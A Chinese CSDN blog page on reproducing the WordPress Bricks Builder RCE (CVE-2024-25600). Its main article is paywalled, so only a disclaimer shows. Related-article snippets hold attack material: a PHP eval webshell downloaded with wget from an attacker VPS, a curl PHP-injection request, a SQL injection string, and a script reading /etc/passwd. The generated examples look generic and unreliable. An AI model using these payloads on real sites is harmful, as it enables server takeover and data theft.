WordPress Bricks Builder RCE(CVE-2024-25600)

最新推荐文章于 2025-01-02 14:22:21 发布
最新推荐文章于 2025-01-02 14:22:21 发布
阅读量1.5k 收藏 18
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/136262850
本文详细介绍了WordPress Bricks Builder Remote Code Execution (CVE-2024-25600) 漏洞,包括漏洞复现步骤。首先,通过获取网站nonce值来确保安全性,然后展示了利用此漏洞的POST请求报文,其中包含了一个可能触发代码执行的queryEditor。文章强调了网络安全的重要性,并提醒读者遵循最小权限原则,以防止类似漏洞被恶意利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

写在开头

本文仅供学习和教育目的之用,旨在提高公众对网络安全漏洞的认识和理解。作者不对任何因阅读或使用本文内容而导致的直接、间接、特殊、附带或后果性损害承担责任。

本文中提到的所有安全漏洞、技术细节和示例代码仅用于说明和演示目的,未经授权,不得用于任何非法或恶意活动。任何尝试利用这些漏洞或进行非法访问的行为都是违反法律的,并且可能导致严重的法律后果。

读者在使用本文提供的信息时,应自行承担风险,并采取适当的安全措施。作者强烈建议读者在尝试任何与漏洞相关的操作之前,先咨询专业的网络安全专家或机构,并确保自己具备足够的技术知识和经验。

此外,本文中的信息可能会随时间和技术进步而变化。作者不对任何因使用或依赖本文中过时或错误的信息而导致的损害承担责任。

最后,本文的发布并不代表作者或发布平台对任何特定产品或服务的安全性或可靠性做出任何保证或担保。在选择和使用安全产品或服务时,读者应自行进行充分的调查和评估。

通过阅读本文,您表示您已经充分理解并接受了上述免责声明。如果您对本文的内容有任何疑问或需要进一步的澄清,请随时联系作者或发布平台。

温馨提示

遵循“最小权限原则”,只授予必要的应用程序和用户访问敏感数据和执行关键操作的权限。这样可以减少潜在攻击者利用漏洞造成的损害。

安全无小事,希望简单的小

了解本专栏 订阅专栏 解锁全文 超级会员免费看
WordPres Bricks Builder 前台RCE漏洞复现(CVE-2024-25600)
0xSec
02-22 2530
WordPres 默认配置安装的 Brick Builder 主题在低于
漏洞复现-wordpress RCE-CVE-2024-25600
qq_73648490的博客
02-26 2680
wordpress 远程代码执行!!1
WordPress-RCE-EXP
04-10
WordPress-RCE-EXP 影响版本 漏洞编号:CVE-2016-10033 (基于) WordPress <= 4.7.1 PHPMailer < 5> <目标站存在的用户名> Python3 wp_rce_exp.py http://127.0.0.1/ admin 0x2漏洞利用 出现 Test_blind_shell>>> 后,说明网站存在RCE漏洞 有两种方式来漏洞利用 一、写入Webshell 1.在vps上开web服务,在web目录下的test.txt文件中写入一句话 <?php @eval($_POST[test]); ?> 2.目标使用wget下载到web目录上 (注意vps需要用ip地址,前面不能加http://) Test_blind_shell>>>/usr/bin/wget --
WordPress<=4.6 RCE(CVE-2016-10033)
jammny
10-24 696
前言 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 漏洞详情 wordpress使用phpmailer组件进行重置密码邮件的发送,但是phpmailer < 5.2.18之前的版本存在命令注入漏洞,WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击
WordPress BuddyPress 越权漏洞RCECVE-2021-21389)
Biu_Biu_Bi的博客
07-15 1888
BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题。
WordPress BuddyPress 存在越权漏洞RCECVE-2021-21389)
xiaobai_20190815的博客
05-11 4583
一、漏洞描述 BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题 二、影响版本 5.0.0 <BuddyPress< 7.2.1 三、漏洞环境 1、dockerhub拉镜像,docker pull hoangkien10
WordPress--mailpress RCE复现
ro4lsc的博客
03-16 7981
本文主要讲述了WordPress--mailpress RCE漏洞的复现,如有纰漏,请联系笔者修改,希望能对您有所帮助。
漏洞复现-wordpress RCE-CVE-2024-256002024年最新零基础如何成为高级网络安全开发
2401_84424712的博客
04-18 634
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。获取python和nuclei poc。
Bricks WordPress 网站生成器中存在 RCE 漏洞,黑客正在积极利用
FreeBuf_的博客
02-20 1066
随后,Patchstack 进一步指出,CVE-2024-25600 安全漏洞源于通过 prepare_query_vars_from_settings 中的 eval 函数执行用户控制的输入,$php_query_raw 是从 queryEditor 构建的。据悉,漏洞 CVE-2024-25600 是由 "prepare_query_vars_from_settings "函数中的一个 eval 函数错误调用导致的,未经身份验证的威胁攻击者可利用该函数执行任意 PHP 代码。
36) Bricks Builder - 构建可排名的 WordPress 站点 v1.10.3.zip
12-10
而36) Bricks Builder 正是这样一个能够帮助用户高效构建可排名WordPress站点的工具。 首先,我们需要了解什么是WordPress站点。WordPress是一种内容管理系统(CMS),它允许用户创建和管理网站内容而不必从头编写...
wordpress 4.6 RCE漏洞利用(CVE-2016-10033)
xiaobai_20190815的博客
04-08 5654
一、漏洞描述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行 二、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 三、漏洞搭建 vulhub下载,傻瓜式安装,然后漏洞在密码重置这个页面 四、漏洞利用 1、抓包,构造POST /wp-login.p
WordPress Exploit-4-6 RCE CVE-2016-10033
公众号shadow sock7
05-07 1153
原文: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html绕过过滤器To exploit the PHPMailer’s mail() injection vulnerability, an attacker would have to be able to append param
漏洞复现-wordpress RCE-CVE-2024-25600(1)网络安全面试项目经验
m0_60666921的博客
04-07 1185
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**④等保简介、等保规定、流程和规范。
CVE-2024-25600 WordPress Bricks Builder RCE-漏洞分析研究
shelter1234567的博客
03-06 5030
CVE-2024-25600 是一个严重的(CVSS 评分 9.8)远程代码执行 (RCE) 漏洞,影响 WordPressBricks Builder 插件。成功利用此漏洞可能允许未经身份验证的攻击者在受影响的基于 WordPress 的网站上远程执行任意 PHP 代码。据报道,该漏洞已被广泛利用,包括尝试在易受攻击的服务器上安装基于 PHP 的恶意 Webshell。Bricks Builder 插件版本 1.9.6.1 或更高版本中已发布解决此漏洞的补丁。Bricks Builder官方。
在一百万个WordPress站点中发现RCE漏洞,攻击者可完全控制后台
shuicarry66的博客
01-02 536
此外,研究员为其发现漏洞获得的奖励仅为1639美元,这在网络安全社区引起了广泛的争议,因为考虑到漏洞所造成的广泛影响,这一补偿显得微不足道。通过简单的数学表达式测试,攻击者可以判断网站是否存在SSTI漏洞,如输出显示“28”,就表明输入在服务器上得到了执行,这是攻击者获得控制的一个明确信号。然而在当前情况下,这一瑕疵为攻击者提供了一个良好的入侵窗口,他们可能乘机在超过一百万个WordPress网站上安装恶意软件、获取敏感数据,或者对使用受影响站点的组织造成声誉及财务上的损失。根据报导,这一漏洞源于。
wordpress漏洞_聊聊 WordPress 5.1.1 CSRF to RCE 漏洞
weixin_39860919的博客
12-12 301
作者:LoRexxar'@知道创宇404实验室时间:2019年3月14日原文链接:聊聊 WordPress 5.1.1 CSRF to RCE 漏洞2019年3月13日, RIPS团队公开了一篇关于WordPress 5.1.1的XSS漏洞详情,标题起的很响亮,叫做wordpress csrf to rce, https://blog.ripstech.com/2019/wordpress-csr...
WordPress JS Support Ticket插件 RCE漏洞复现
0xSec
04-11 807
WordPress中的JS Support Ticket插件存在未经上传漏洞,未经身份验证的攻击者可以上传恶意脚本的服务器,执行任意指令,从而获取服务器权限。
备份插件存在严重RCE漏洞,可导致WordPress网站遭接管
smellycat000的专栏
12-13 317
聚焦源代码安全,网罗国内外最新资讯!作者:Elizabeth Montalbano编译:代码卫士WordPress 备份插件 Backup Migration 的下载次数已超过9万次,其中存在一个严重的RCE漏洞,可导致易受攻击的 WordPress 网站遭接管。这是又一起因建站平台插件漏洞造成的风险事件。Nex Team 在 Backup Migration 插件中发现了一个 PHP 代码注入...
wordpress cve
最新发布
01-15
### WordPress CVE 列表及详情 #### 学习管理系统插件 LearnPress SQL 注入漏洞 (CVE-2024-8522) WordPress 是广泛使用的开源内容管理系统(CMS),LearnPress 是其中一个流行的 LMS 插件。然而,在某些版本中存在 SQL 注入漏洞,这使得攻击者能够执行恶意查询并可能获取数据库访问权限。 ```sql -- 示例SQL注入语句 SELECT * FROM wp_posts WHERE post_type = 'lp_course' AND ID = 1 OR '1'='1'; ``` 这种类型的漏洞通常发生在未正确验证用户输入的情况下,特别是在处理动态 SQL 查询时[^1]。 #### 社区建设插件 BuddyPress 越权漏洞 RCE (CVE-2021-21389) BuddyPress 提供了构建社交网络的功能,但在早期版本中发现了一个严重的越权漏洞。非特权用户可以利用 REST API 成员端点中的缺陷提升自己的权限至管理员级别。此问题已经在后续版本得到修复,建议所有受影响的实例尽快升级到最新稳定版。 ```php // 检查当前BP版本号 if (!version_compare(get_option('bp_version'), '7.2.1', '>=')) { echo "您的BuddyPress版本可能存在安全隐患"; } ``` 为了防止此类风险,开发者应当严格控制API接口的安全性和最小化授权原则的应用[^2]。 #### 页面构建器 Bricks Builder 远程命令执行漏洞 (CVE-2024-25600) Bricks Builder 是一款用于快速搭建网页布局的强大工具,不过在其部分发行版里发现了远程代码执行的风险。如果成功被利用,则可能导致整个Web应用程序完全受控于黑客手中。因此对于这类高危级别的安全事件必须引起足够的重视,并及时采取措施加以防范。 ```bash curl -X POST http://example.com/wp-admin/admin-ajax.php \ -H "Content-Type: application/json" \ -d '{"action":"bricks_builder_save","data":{"content": "<?php phpinfo(); ?>"}}' ``` 上述示例展示了如何向服务器发送带有恶意PHP代码的数据包以触发RCE条件[^3]。 #### 文件上传组件 WP File Upload 任意文件读取漏洞 (CVE-2024-9047) WP File Upload 插件允许用户上载各种类型的文档资料,但由于缺乏充分的身份验证机制以及不当配置,造成了潜在的信息泄露威胁。特别是当fopen函数被滥用时,它可能会让未经授权的人士查看甚至移除系统内的重要资源文件。 ```python import requests url = "http://target-site.com/index.php?route=wfu_file_downloader" params = {'file': '/etc/passwd'} response = requests.get(url, params=params) print(response.text) ``` 这段Python脚本模拟了一次针对`wfu_file_downloader.php`文件发起GET请求的过程,其中包含了指向目标系统的路径参数,从而实现了对指定位置下文件内容的非法获取操作[^4]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值